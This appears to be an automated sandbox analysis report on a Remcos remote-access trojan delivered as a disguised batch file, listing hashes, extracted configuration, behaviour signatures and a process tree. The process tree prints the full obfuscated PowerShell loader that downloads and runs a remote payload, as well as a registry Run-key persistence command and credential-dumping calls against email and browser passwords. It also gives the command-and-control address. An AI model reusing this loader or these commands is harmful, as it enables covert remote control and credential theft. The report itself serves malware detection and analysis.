Analysis

  • max time kernel
    149s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-10-2024 14:00

General

  • Target

    rComandaKOMARONTRADESRL435635Lukketid.bat

  • Size

    6KB

  • MD5

    86c67fcc3df920319f706b16d26a9d92

  • SHA1

    4f66cf0abe3a9d5c617d752c01e7b7de5d1baf0d

  • SHA256

    1bf09bcb5bfa440fc6ce5c1d3f310fb274737248bf9acdd28bea98c9163a745a

  • SHA512

    45239f2533c001bd332c2ae669f0d25fcba4316665a193306b865e780595e480c08cb407d4c5a883ecd16ff5fc59e35d78174c2b0fe275ef2c0e734ecd5f7841

  • SSDEEP

    192:1HpiJn8QCifmYSfSQYoQZ6DUOsPsRXxVm+:QntZuSbzUiPKBR

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

dumboi.duckdns.org:51525

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-8AXK3L

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rComandaKOMARONTRADESRL435635Lukketid.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1396
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden " <#Blokfri Idioelectric Anikis Alveolate Foreteelses Konsultationstidens #>;$Synkrocyklotroner='schoolie';<#Circumorbital Gastrologists Tachygraphical Aegises Skyldnersvigens #>;$Udmelder=$Megadontia+$host.UI;function Bilinspektrerne($appast){If ($Udmelder) {$Scooterstvlers++;}$Unsecurableness=$Sallnternalized+$appast.'Length'-$Scooterstvlers; for( $Sall=4;$Sall -lt $Unsecurableness;$Sall+=5){$Balsatr++;$Lushness+=$appast[$Sall];$Brydetag='Wrox';}$Lushness;}function Curtnesses178($Kuvertbrd){ &($Demandant) ($Kuvertbrd);}$Heraldisk237=Bilinspektrerne ' DatMPs coSortzTatti BurlUndelPo,da Boh/nu h ';$Heraldisk237+=Bilinspektrerne 'Kart5 Fes. s e0Jims Reph( icrW P aiAdpmn FoddXenooMel.w LissBib T,rnN ompTAcan F gl1Blom0Coni. Pen0Bl,k; uss Be aW Ssti Nolnpar,6Am.l4Haan;Efte LevxHydr6 Orb4 all;inds I,terAa sv Enk: Prc1Band3Cer 1 Sp .Fluo0Fors)Sce. KaldG rbeeBitucDynek ouoMult/c rp2Mann0Veli1ta l0Syno0Klau1 Vig0 R.m1 Int geFS,lei etrrBandeVigefPrepoRevexDril/Mods1 ubl3Arta1 has.Sost0Phot ';$Tingenes=Bilinspektrerne 'PlasuWahwSUrmieFr dR uv-P eta Sogg adE C,snHersTPiva ';$Electrodeposition=Bilinspektrerne 'Ur.ahAgentEgy,t Ha.pBanasLeve:Ger /De,t/St lcGummaSubarcande,edief lerKolofAssuiFanfn ra d,ybveUd er .no. Vrer GyroMisl/ BioSalphlHun dMille ertnOarmsEmbo.PlendHofts TagpBorn ';$Lithotype=Bilinspektrerne 'Selv> ono ';$Demandant=Bilinspektrerne ' Av iStyre ConxEl c ';$Fusteric='Harmonizer';$Countercyclical104='\Studenterunderviserens.Pro';Curtnesses178 (Bilinspektrerne 'stic$StrogPriolZemio Rr BMaleAVagrlSala:ProlS MinlSlaba Picg U ctLoconUk.rIStepNBestGBvseE AdenTermSMoon=Jerq$StvsEP odNTy ev,ubj:PentAArv pHomop k.hDLympaT,iltIn,raHe e+Illa$GlooCN tioBestuSa fNOv,rTDru.e AllrStetC NedyEnerCRev LDefoI ,enc HelA I.dlDobb1Meso0Tord4Inan ');Curtnesses178 (Bilinspektrerne 'dar $ ncogGesjL Os OUncoBAcylaSworlLipa:Cl,sounsnVBaiseWeptRInp DLeveEBygrfaverIMarxNConseRiaad Fir=Konc$Ri,heS ovlForsEK.abc ,efT ortR R gOUnbeDGr,oERebuPG.osO UdfSOut IElemTAffai,isco raN maa.H posFamiPVariLPo,yiFa lT ,oe(Dise$MickLSpecILserT ,olh.telO DawtCyclY ,orp F deopre) ero ');Curtnesses178 (Bilinspektrerne 'Mass[,utoN Hene N nTTo d. orsPhipE ReiR RelV Maki.ensCS.yreDagtpIgnooSa.dI,rpeN Klit uteMDol,ADel nSmaraIdenGPearECorbrStra]Zo l:El c:F igSU coEbaneCUngduafg.R kui Ha.TUndeyResspEmi RLupeo iptF emOCantCBaroOPosiLPa.s Leve=Fort gany[For N f reMyoftUdre.PerfS sthENonccNybyUSeksrCorrITrevt Al,YbrdspVaskrSpleo GerT emioBiclc I hoSu eLSembt oryTilrPMu,ie I n]Ener:Jeun:NydttAareL olkSAdje1All 2 Stu ');$Electrodeposition=$Overdefined[0];$Etapernes1=(Bilinspektrerne 'Char$.pisgAga LPyroOGruebUnc a ntoLspea: mregw lfUCen NTequs T rTSkenO mdanD veEinun=TrueNJan,E IllwJilt-BeviOI.teb Nu jAflseSemiCPerit ex Pre,SSagtYHueasIndmTKaj,ERe,lm B y. oglNSoucEPropt Tek.nonuwBarrECourB tenCAndeLCalyICloieSkumNFlocTSarc ');Curtnesses178 ($Etapernes1);Curtnesses178 (Bilinspektrerne 'R ci$SkorG BetuGemon consKavatUlceo DrinConvePimp.TeleH.egoeSenaaBanndSpi eKontr Ky,sbolo[Kond$AfmaTNdhjiSpe.nEksagAilueKlasn u feTelesKof ]A.va=Theo$D niHRodte edlrLkkeaPan,l ekodSchoitr psAnenk Har2Imme3Reci7Grun ');$Rigsbiblioteker=Bilinspektrerne 'Napp$humoG Y cuI.fin Ha sArv tBarso alnAlareS ry.Fou DEs,aoH stw ammnVaablMonooEvanaBe idRhytFPenuiArkil Bo esen (.urm$Non.E KallNetteHonecSpintFagurThumoU gldFol.eV ltp AdsoIdeasForfinatutPropi ParoBou,nw ir, Mih$CalcD Be iRygesPreeiPosinKi rfRawieMedssConctAut )Frys ';$Disinfest=$Slagtningens;Curtnesses178 (Bilinspektrerne 'O.is$Haskgbridl T,oOMinkBSekuaUafvlMeso: VedcDvstICh rGSol A GemRkee HForsATi.lNEkmadKogeeAnt lFalh=oute( FactKl.iEmot S Dyrtbrig-AbsupIndhATranTBugrhhidl Schi$ se.D CatiPolysSoftiSylpnP ylFBonkEUnens Fast uch)Styr ');while (!$Cigarhandel) {Curtnesses178 (Bilinspektrerne 'Rent$StudgNedslBogpoHamibForsaidiolHi s:uforPAlstaNon.sAfgitExcaoBereu NecrSki.eOverl D,llRegie.ete=A er$ GartMel rU,feu raceImpe ') ;Curtnesses178 $Rigsbiblioteker;Curtnesses178 (Bilinspektrerne 'PateSKon t MonaY.mmrOvertVo d-DystSDefilOprmEPastEblidPHjfr ca4 Se ');Curtnesses178 (Bilinspektrerne 'Papi$AllegUrinlE keophrebbullaFai LBill:regnCRudeIUncaGSpluASestRFunkhDursa MednUrs d lose G,gLBoll=H er(MandTProdeStarSs vsTUnde- onoPEm gaDo.eTundsHLekt edw$P,dodHypoIBasnSNeosIPa inu lef PereKlynSKa eTS dd)Actu ') ;Curtnesses178 (Bilinspektrerne ' ,ar$ An.gSpinLHeavo Ta BPuddaC raLSp t:DuplsFastv illA WonLDogteUdp,gIma.a omaNNedvg f rS osthSonoUNo.es Boue Sk tC rosmetr=Da.f$GermgUdr L,iglO clab HreAQuaklB nd:StorDNaver HeriUdsaV PlaI etsSkr,+Sol +Derm%n,nd$NonrORespv UsseKar RTra,DArioE klifDualiRebaNKa pEMachDUnd..Str CCocyoUnteUBencn raTVidn ') ;$Electrodeposition=$Overdefined[$Svalegangshusets];}$Klarinetten212=301357;$bitters=30845;Curtnesses178 (Bilinspektrerne 'K.it$BemaGStigLErfaoBrddBSpidaSkavlMont:TilseSoemr.letiSyntkIsfyOJoch7Flak0S rn nont= Ko Clog F,reRegiTu,de-glimCInseoBr snAnbrtN.nae ProNVrigTMig, Toxi$BogaDAntiiRensS ,lyiM ndn SkyfMotoEGeocsMyrrtKnis ');Curtnesses178 (Bilinspektrerne ' For$DagagLinil Slao NigbAlfeaMandlBue :TurbBtungeHyg c ThucLydsaApe f alaipo rcuneaoCarc Epic=Rund List[Sod S ChlyCra,s rthtRelbe ,eim Tor.FavoCHamlo BisnO,tevInvoeLandrSmertLiby] ele:K mm:FodsF Ar,rBi aoIrremsl.pBRea,aFoolsMik.e.tep6Brne4Un.eS SamtH gerT,iaiHogtnstlngTran(St.t$SpilESpilr U,oisupek.aktoClad7Mukk0B.fo)iso, ');Curtnesses178 (Bilinspektrerne 'Mult$AflbG,ivilPiniOQuadB levAReg,lAcro:DubbPS neu.xtrRH lsiE actImpeA lasnMule Ud m=Ther Hype[For,sDi lyUdk s.ilbTBef.eNonsmCurv. dreT eacePostX ainTPhon.gavoeHvetnYnglCDiffOGr pdVertICon nSlatgKlas] oe:Alm,: huAUndlsDamnCSkriITr ni Sil. H yG ForESkolTIvriSRaguTD.meRUfo I Po,nUdsagF er(Heli$Baryb rooe TaccAd ecCapeaBr,gFJordiDem CTra oTr.p)Dat ');Curtnesses178 (Bilinspektrerne 'Basi$ PacGf,nkLT.llOBrdgBFremADecalfel :LittfStafO EmbRDaitm roUInsieDiskOTugtMS.rusG.unt ktiN.kspDUnelISommgViduHGravEelfedOve sDybf=Komm$Svu,pDivuu B mRSweeiHex TO tha KdenBlin. UnmsForfu FecBKamesInfiTBanaR Hi iMoleNTrangRand(Eury$TotukContLStudaInfaR F mImedvnBusiEUf rtGemetSpa EMy tNTyv.2Outc1 Anp2Stal,Char$HoejbM,taIM.ddt TidTTurgeCerarEdlas Rav)Gr,v ');Curtnesses178 $Formueomstndigheds;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3980
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Blokfri Idioelectric Anikis Alveolate Foreteelses Konsultationstidens #>;$Synkrocyklotroner='schoolie';<#Circumorbital Gastrologists Tachygraphical Aegises Skyldnersvigens #>;$Udmelder=$Megadontia+$host.UI;function Bilinspektrerne($appast){If ($Udmelder) {$Scooterstvlers++;}$Unsecurableness=$Sallnternalized+$appast.'Length'-$Scooterstvlers; for( $Sall=4;$Sall -lt $Unsecurableness;$Sall+=5){$Balsatr++;$Lushness+=$appast[$Sall];$Brydetag='Wrox';}$Lushness;}function Curtnesses178($Kuvertbrd){ &($Demandant) ($Kuvertbrd);}$Heraldisk237=Bilinspektrerne ' DatMPs coSortzTatti BurlUndelPo,da Boh/nu h ';$Heraldisk237+=Bilinspektrerne 'Kart5 Fes. s e0Jims Reph( icrW P aiAdpmn FoddXenooMel.w LissBib T,rnN ompTAcan F gl1Blom0Coni. Pen0Bl,k; uss Be aW Ssti Nolnpar,6Am.l4Haan;Efte LevxHydr6 Orb4 all;inds I,terAa sv Enk: Prc1Band3Cer 1 Sp .Fluo0Fors)Sce. KaldG rbeeBitucDynek ouoMult/c rp2Mann0Veli1ta l0Syno0Klau1 Vig0 R.m1 Int geFS,lei etrrBandeVigefPrepoRevexDril/Mods1 ubl3Arta1 has.Sost0Phot ';$Tingenes=Bilinspektrerne 'PlasuWahwSUrmieFr dR uv-P eta Sogg adE C,snHersTPiva ';$Electrodeposition=Bilinspektrerne 'Ur.ahAgentEgy,t Ha.pBanasLeve:Ger /De,t/St lcGummaSubarcande,edief lerKolofAssuiFanfn ra d,ybveUd er .no. Vrer GyroMisl/ BioSalphlHun dMille ertnOarmsEmbo.PlendHofts TagpBorn ';$Lithotype=Bilinspektrerne 'Selv> ono ';$Demandant=Bilinspektrerne ' Av iStyre ConxEl c ';$Fusteric='Harmonizer';$Countercyclical104='\Studenterunderviserens.Pro';Curtnesses178 (Bilinspektrerne 'stic$StrogPriolZemio Rr BMaleAVagrlSala:ProlS MinlSlaba Picg U ctLoconUk.rIStepNBestGBvseE AdenTermSMoon=Jerq$StvsEP odNTy ev,ubj:PentAArv pHomop k.hDLympaT,iltIn,raHe e+Illa$GlooCN tioBestuSa fNOv,rTDru.e AllrStetC NedyEnerCRev LDefoI ,enc HelA I.dlDobb1Meso0Tord4Inan ');Curtnesses178 (Bilinspektrerne 'dar $ ncogGesjL Os OUncoBAcylaSworlLipa:Cl,sounsnVBaiseWeptRInp DLeveEBygrfaverIMarxNConseRiaad Fir=Konc$Ri,heS ovlForsEK.abc ,efT ortR R gOUnbeDGr,oERebuPG.osO UdfSOut IElemTAffai,isco raN maa.H posFamiPVariLPo,yiFa lT ,oe(Dise$MickLSpecILserT ,olh.telO DawtCyclY ,orp F deopre) ero ');Curtnesses178 (Bilinspektrerne 'Mass[,utoN Hene N nTTo d. orsPhipE ReiR RelV Maki.ensCS.yreDagtpIgnooSa.dI,rpeN Klit uteMDol,ADel nSmaraIdenGPearECorbrStra]Zo l:El c:F igSU coEbaneCUngduafg.R kui Ha.TUndeyResspEmi RLupeo iptF emOCantCBaroOPosiLPa.s Leve=Fort gany[For N f reMyoftUdre.PerfS sthENonccNybyUSeksrCorrITrevt Al,YbrdspVaskrSpleo GerT emioBiclc I hoSu eLSembt oryTilrPMu,ie I n]Ener:Jeun:NydttAareL olkSAdje1All 2 Stu ');$Electrodeposition=$Overdefined[0];$Etapernes1=(Bilinspektrerne 'Char$.pisgAga LPyroOGruebUnc a ntoLspea: mregw lfUCen NTequs T rTSkenO mdanD veEinun=TrueNJan,E IllwJilt-BeviOI.teb Nu jAflseSemiCPerit ex Pre,SSagtYHueasIndmTKaj,ERe,lm B y. oglNSoucEPropt Tek.nonuwBarrECourB tenCAndeLCalyICloieSkumNFlocTSarc ');Curtnesses178 ($Etapernes1);Curtnesses178 (Bilinspektrerne 'R ci$SkorG BetuGemon consKavatUlceo DrinConvePimp.TeleH.egoeSenaaBanndSpi eKontr Ky,sbolo[Kond$AfmaTNdhjiSpe.nEksagAilueKlasn u feTelesKof ]A.va=Theo$D niHRodte edlrLkkeaPan,l ekodSchoitr psAnenk Har2Imme3Reci7Grun ');$Rigsbiblioteker=Bilinspektrerne 'Napp$humoG Y cuI.fin Ha sArv tBarso alnAlareS ry.Fou DEs,aoH stw ammnVaablMonooEvanaBe idRhytFPenuiArkil Bo esen (.urm$Non.E KallNetteHonecSpintFagurThumoU gldFol.eV ltp AdsoIdeasForfinatutPropi ParoBou,nw ir, Mih$CalcD Be iRygesPreeiPosinKi rfRawieMedssConctAut )Frys ';$Disinfest=$Slagtningens;Curtnesses178 (Bilinspektrerne 'O.is$Haskgbridl T,oOMinkBSekuaUafvlMeso: VedcDvstICh rGSol A GemRkee HForsATi.lNEkmadKogeeAnt lFalh=oute( FactKl.iEmot S Dyrtbrig-AbsupIndhATranTBugrhhidl Schi$ se.D CatiPolysSoftiSylpnP ylFBonkEUnens Fast uch)Styr ');while (!$Cigarhandel) {Curtnesses178 (Bilinspektrerne 'Rent$StudgNedslBogpoHamibForsaidiolHi s:uforPAlstaNon.sAfgitExcaoBereu NecrSki.eOverl D,llRegie.ete=A er$ GartMel rU,feu raceImpe ') ;Curtnesses178 $Rigsbiblioteker;Curtnesses178 (Bilinspektrerne 'PateSKon t MonaY.mmrOvertVo d-DystSDefilOprmEPastEblidPHjfr ca4 Se ');Curtnesses178 (Bilinspektrerne 'Papi$AllegUrinlE keophrebbullaFai LBill:regnCRudeIUncaGSpluASestRFunkhDursa MednUrs d lose G,gLBoll=H er(MandTProdeStarSs vsTUnde- onoPEm gaDo.eTundsHLekt edw$P,dodHypoIBasnSNeosIPa inu lef PereKlynSKa eTS dd)Actu ') ;Curtnesses178 (Bilinspektrerne ' ,ar$ An.gSpinLHeavo Ta BPuddaC raLSp t:DuplsFastv illA WonLDogteUdp,gIma.a omaNNedvg f rS osthSonoUNo.es Boue Sk tC rosmetr=Da.f$GermgUdr L,iglO clab HreAQuaklB nd:StorDNaver HeriUdsaV PlaI etsSkr,+Sol +Derm%n,nd$NonrORespv UsseKar RTra,DArioE klifDualiRebaNKa pEMachDUnd..Str CCocyoUnteUBencn raTVidn ') ;$Electrodeposition=$Overdefined[$Svalegangshusets];}$Klarinetten212=301357;$bitters=30845;Curtnesses178 (Bilinspektrerne 'K.it$BemaGStigLErfaoBrddBSpidaSkavlMont:TilseSoemr.letiSyntkIsfyOJoch7Flak0S rn nont= Ko Clog F,reRegiTu,de-glimCInseoBr snAnbrtN.nae ProNVrigTMig, Toxi$BogaDAntiiRensS ,lyiM ndn SkyfMotoEGeocsMyrrtKnis ');Curtnesses178 (Bilinspektrerne ' For$DagagLinil Slao NigbAlfeaMandlBue :TurbBtungeHyg c ThucLydsaApe f alaipo rcuneaoCarc Epic=Rund List[Sod S ChlyCra,s rthtRelbe ,eim Tor.FavoCHamlo BisnO,tevInvoeLandrSmertLiby] ele:K mm:FodsF Ar,rBi aoIrremsl.pBRea,aFoolsMik.e.tep6Brne4Un.eS SamtH gerT,iaiHogtnstlngTran(St.t$SpilESpilr U,oisupek.aktoClad7Mukk0B.fo)iso, ');Curtnesses178 (Bilinspektrerne 'Mult$AflbG,ivilPiniOQuadB levAReg,lAcro:DubbPS neu.xtrRH lsiE actImpeA lasnMule Ud m=Ther Hype[For,sDi lyUdk s.ilbTBef.eNonsmCurv. dreT eacePostX ainTPhon.gavoeHvetnYnglCDiffOGr pdVertICon nSlatgKlas] oe:Alm,: huAUndlsDamnCSkriITr ni Sil. H yG ForESkolTIvriSRaguTD.meRUfo I Po,nUdsagF er(Heli$Baryb rooe TaccAd ecCapeaBr,gFJordiDem CTra oTr.p)Dat ');Curtnesses178 (Bilinspektrerne 'Basi$ PacGf,nkLT.llOBrdgBFremADecalfel :LittfStafO EmbRDaitm roUInsieDiskOTugtMS.rusG.unt ktiN.kspDUnelISommgViduHGravEelfedOve sDybf=Komm$Svu,pDivuu B mRSweeiHex TO tha KdenBlin. UnmsForfu FecBKamesInfiTBanaR Hi iMoleNTrangRand(Eury$TotukContLStudaInfaR F mImedvnBusiEUf rtGemetSpa EMy tNTyv.2Outc1 Anp2Stal,Char$HoejbM,taIM.ddt TidTTurgeCerarEdlas Rav)Gr,v ');Curtnesses178 $Formueomstndigheds;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4152
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2900
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "eleutherodactyli" /t REG_EXPAND_SZ /d "%Potentiometrene% -windowstyle 1 $Sjakaltppernes=(gp -Path 'HKCU:\Software\spillemnt\').Kondensstriber;%Potentiometrene% ($Sjakaltppernes)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1552
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "eleutherodactyli" /t REG_EXPAND_SZ /d "%Potentiometrene% -windowstyle 1 $Sjakaltppernes=(gp -Path 'HKCU:\Software\spillemnt\').Kondensstriber;%Potentiometrene% ($Sjakaltppernes)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:4388
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\gvwjeihhrbfmyaossroitiktjqskinc"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3888
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\rpjcfbsjnjxziokwkcacvvwkseklbybilx"
        3⤵
        • Accesses Microsoft Outlook accounts
        • System Location Discovery: System Language Discovery
        PID:2472
      • C:\Windows\SysWOW64\msiexec.exe
        C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\trpnyt"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4992

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat

    Filesize

    144B

    MD5

    136c086c2f1623463d3ac19f4ded0918

    SHA1

    6b37b3cac16f196f7db685db7dff5250cec93ccd

    SHA256

    1f0254968c1d5a7d00a7cfb80bb254ba77fcd1d5795cbf5aa38147b2eb659066

    SHA512

    6e6e1b8cc1b446ce6b2e4d07f6f9b04842a5a539358d5bb9482535bb80d029b1de550e07572e0a0aa9b8bf06cfb2d4bae880bee722fb521961e08279436581bf

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    1e674e03a1292678c1aeab7010a77a6c

    SHA1

    de005829eda4db62abec97cfeaa98121448da018

    SHA256

    9bbd6466b0a2aa528cb66cfc3729f91f623b1d5d6d24cb4ebea3159e8284d3ea

    SHA512

    36dde97decf9342cd5314ea62842bdd0f3c0698eee4a782244879eb07c0a9ca4de8f3dfbb3bc03a5fd1af7720cbd47976a3e44434ae20a900507143bee9e02d1

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qg1cdc3q.nii.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\gvwjeihhrbfmyaossroitiktjqskinc

    Filesize

    4KB

    MD5

    60a0bdc1cf495566ff810105d728af4a

    SHA1

    243403c535f37a1f3d5f307fc3fb8bdd5cbcf6e6

    SHA256

    fd12da9f9b031f9fa742fa73bbb2c9265f84f49069b7c503e512427b93bce6d2

    SHA512

    4445f214dbf5a01d703f22a848b56866f3f37b399de503f99d40448dc86459bf49d1fa487231f23c080a559017d72bcd9f6c13562e1f0bd53c1c9a89e73306a5

  • C:\Users\Admin\AppData\Roaming\Studenterunderviserens.Pro

    Filesize

    432KB

    MD5

    f347dbcd775a008d01ce72c6bbf11ae5

    SHA1

    dcb37893af81d46db6204308ff92410c9a9649d7

    SHA256

    15623d3261b6bbf32c68c8c8fb8ba64035de2e510efee53d390c8b61db12eb2a

    SHA512

    11b9cb720dfcb9e3f0344f0698a5d095a84daf54579faf41a96332c9a97bee4f4c4e14830f5440a4d2f9fdda370989c1e2c7d5b9d4da1c16acc489e47fad54c6

  • memory/2472-69-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/2472-78-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/2472-77-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/2900-89-0x00000000207F0000-0x0000000020809000-memory.dmp

    Filesize

    100KB

  • memory/2900-63-0x0000000000A70000-0x0000000001CC4000-memory.dmp

    Filesize

    18.3MB

  • memory/2900-85-0x00000000207F0000-0x0000000020809000-memory.dmp

    Filesize

    100KB

  • memory/2900-88-0x00000000207F0000-0x0000000020809000-memory.dmp

    Filesize

    100KB

  • memory/3888-73-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/3888-68-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/3888-75-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/3888-71-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/3980-18-0x00007FFA395E0000-0x00007FFA3A0A1000-memory.dmp

    Filesize

    10.8MB

  • memory/3980-13-0x00007FFA395E0000-0x00007FFA3A0A1000-memory.dmp

    Filesize

    10.8MB

  • memory/3980-14-0x00007FFA395E0000-0x00007FFA3A0A1000-memory.dmp

    Filesize

    10.8MB

  • memory/3980-17-0x00007FFA395E0000-0x00007FFA3A0A1000-memory.dmp

    Filesize

    10.8MB

  • memory/3980-3-0x00000251ED6A0000-0x00000251ED6C2000-memory.dmp

    Filesize

    136KB

  • memory/3980-2-0x00007FFA395E3000-0x00007FFA395E5000-memory.dmp

    Filesize

    8KB

  • memory/3980-21-0x00007FFA395E0000-0x00007FFA3A0A1000-memory.dmp

    Filesize

    10.8MB

  • memory/4152-27-0x0000000005280000-0x00000000052A2000-memory.dmp

    Filesize

    136KB

  • memory/4152-43-0x0000000007880000-0x0000000007EFA000-memory.dmp

    Filesize

    6.5MB

  • memory/4152-46-0x0000000007460000-0x0000000007482000-memory.dmp

    Filesize

    136KB

  • memory/4152-50-0x0000000074DA0000-0x0000000075550000-memory.dmp

    Filesize

    7.7MB

  • memory/4152-49-0x0000000074DA0000-0x0000000075550000-memory.dmp

    Filesize

    7.7MB

  • memory/4152-51-0x0000000074DA0000-0x0000000075550000-memory.dmp

    Filesize

    7.7MB

  • memory/4152-53-0x0000000074DA0000-0x0000000075550000-memory.dmp

    Filesize

    7.7MB

  • memory/4152-52-0x0000000074DAE000-0x0000000074DAF000-memory.dmp

    Filesize

    4KB

  • memory/4152-54-0x0000000074DA0000-0x0000000075550000-memory.dmp

    Filesize

    7.7MB

  • memory/4152-56-0x0000000074DA0000-0x0000000075550000-memory.dmp

    Filesize

    7.7MB

  • memory/4152-55-0x0000000008A60000-0x000000000AB08000-memory.dmp

    Filesize

    32.7MB

  • memory/4152-57-0x0000000074DA0000-0x0000000075550000-memory.dmp

    Filesize

    7.7MB

  • memory/4152-58-0x0000000074DA0000-0x0000000075550000-memory.dmp

    Filesize

    7.7MB

  • memory/4152-45-0x00000000074D0000-0x0000000007566000-memory.dmp

    Filesize

    600KB

  • memory/4152-44-0x00000000067E0000-0x00000000067FA000-memory.dmp

    Filesize

    104KB

  • memory/4152-47-0x00000000084B0000-0x0000000008A54000-memory.dmp

    Filesize

    5.6MB

  • memory/4152-42-0x00000000062D0000-0x000000000631C000-memory.dmp

    Filesize

    304KB

  • memory/4152-41-0x0000000006240000-0x000000000625E000-memory.dmp

    Filesize

    120KB

  • memory/4152-30-0x0000000005C20000-0x0000000005F74000-memory.dmp

    Filesize

    3.3MB

  • memory/4152-28-0x0000000005320000-0x0000000005386000-memory.dmp

    Filesize

    408KB

  • memory/4152-29-0x0000000005B70000-0x0000000005BD6000-memory.dmp

    Filesize

    408KB

  • memory/4152-22-0x0000000074DAE000-0x0000000074DAF000-memory.dmp

    Filesize

    4KB

  • memory/4152-23-0x0000000002920000-0x0000000002956000-memory.dmp

    Filesize

    216KB

  • memory/4152-25-0x0000000074DA0000-0x0000000075550000-memory.dmp

    Filesize

    7.7MB

  • memory/4152-24-0x0000000005540000-0x0000000005B68000-memory.dmp

    Filesize

    6.2MB

  • memory/4152-26-0x0000000074DA0000-0x0000000075550000-memory.dmp

    Filesize

    7.7MB

  • memory/4992-70-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/4992-76-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

